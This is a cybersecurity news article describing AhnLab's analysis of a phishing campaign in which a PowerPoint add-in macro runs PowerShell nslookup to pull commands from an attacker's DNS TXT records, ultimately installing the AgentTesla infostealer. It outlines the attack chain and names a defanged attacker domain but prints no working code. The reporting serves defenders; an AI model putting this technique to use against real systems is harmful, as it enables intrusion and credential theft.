Cyber Security News

DNS TXT Records Can Be Used by Hackers to Execute Malware

DNS TXT record enables domain administrators to input text into DNS, initially for human-readable notes, but now it’s utilized for diverse purposes like:- 

  • Spam prevention
  • Domain ownership verification

Spam email senders disguise domains to evade detection, but servers verify emails using the DNS TXT record as a key element.

Moreover, the domain owners can verify their ownership by uploading a TXT record with specific information or modifying the existing one.

ASEC from AhnLab has confirmed the use of DNS TXT Records in malware execution, which is a rare technique that holds importance for detection and analysis purposes.

Malware Execution using DNS TXT Records

The malware uses DNS TXT records differently, closer to the original purpose of entering DNS-related info, rather than the common method mentioned earlier.

A malicious PPAM file attachment in Phishing email (Source – AhnLab)

A phishing email included a fake “Order Inquiry” with a PowerPoint add-in (PPAM) file. PPAM files have user-defined macros and VBA code, and executing the PowerPoint macro triggered PowerShell’s nslookup management tool.

Macro code in the PPAM file (Source – AhnLab)

Within the PPAM file, the macro code is straightforward, and when executed, it runs PowerShell for nslookup, querying the DNS TXT record. The threat actor included the command for their next process in the DNS TXT record.

The threat actor’s multiple attempts on child processes suggest an evasion strategy against anti-malware solutions and other related products.

Analyzing the DNS TXT record of the threat actor’s server (abena-dk[.]cam) reveals a unique data output, deviating from typical DNS TXT record purposes. 

It suggests that the threat actor experimented with subdomains, executed calculator (calc.exe), and instead of JavaScript (js) files, employed the VBScript (.vbs) files.

nslookup result of the various subdomains (Source – AhnLab)

The threat actor employed an unexplored method by uploading PowerShell commands on their DNS TXT record, enabling execution upon nslookup query.

This approach differed from the traditional practice of writing PowerShell commands directly in the macro code and allowed for malware execution.

After saving as meth.js, the methewPayload.js file’s PowerShell URL is used with wscript.exe to execute it, and then it downloads a Base64-encoded DLL binary from an external URL.

This malware type isn’t new but rather originated from the hacking group Hagga (Aggah) and has been circulating since late 2021. 

Based on TTP analysis, the threat actor employed various methods, including:-

  • Distributing documents with malicious macros
  • Using characteristic .NET code elements
  • Employing the StrReverse function
  • Downloading additional malicious files
  • Executing additional malicious files

While the downloaded file was identified as an AgentTesla, that is a . NET-based Infostealer.

“AI-based email security measures Protect your business From Email Threats!” – .

Tushar Subhra Dutta

Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Recent Posts

Microsoft Unveils Ways To Detect Compromised Devices In Your Organization

Microsoft has announced a new way to spot potentially hacked machines in your organization.  Analysts…

3 mins ago

New ScriptBlock Smuggling Attack Let Ackers Bypass PowerShell Security Logs And AMSI

Ever since the introduction of PowerShell v5, there have been less usage of the application…

19 mins ago

Hackers Leveraging New Social Engineering To Run PowerShell And Install Malware

Hackers use social engineering as it focuses on the psychological rather than technological aspects of…

2 hours ago

Hackers Attacking Hotel Owners & Employees as Potential Guests

Since last summer, hotel owners and employees have grappled with a surge in malicious e-mails…

3 hours ago

New OPIX Ransomware Encrypting Files With Random Character String

A recently identified ransomware variant dubbed OPIX encrypts user files using a random character string…

3 hours ago

Empire Market Founders Charged for Operating $430 Million Dark Web Marketplace

Two men have been charged in federal court in Chicago with operating “Empire Market,” a…

5 hours ago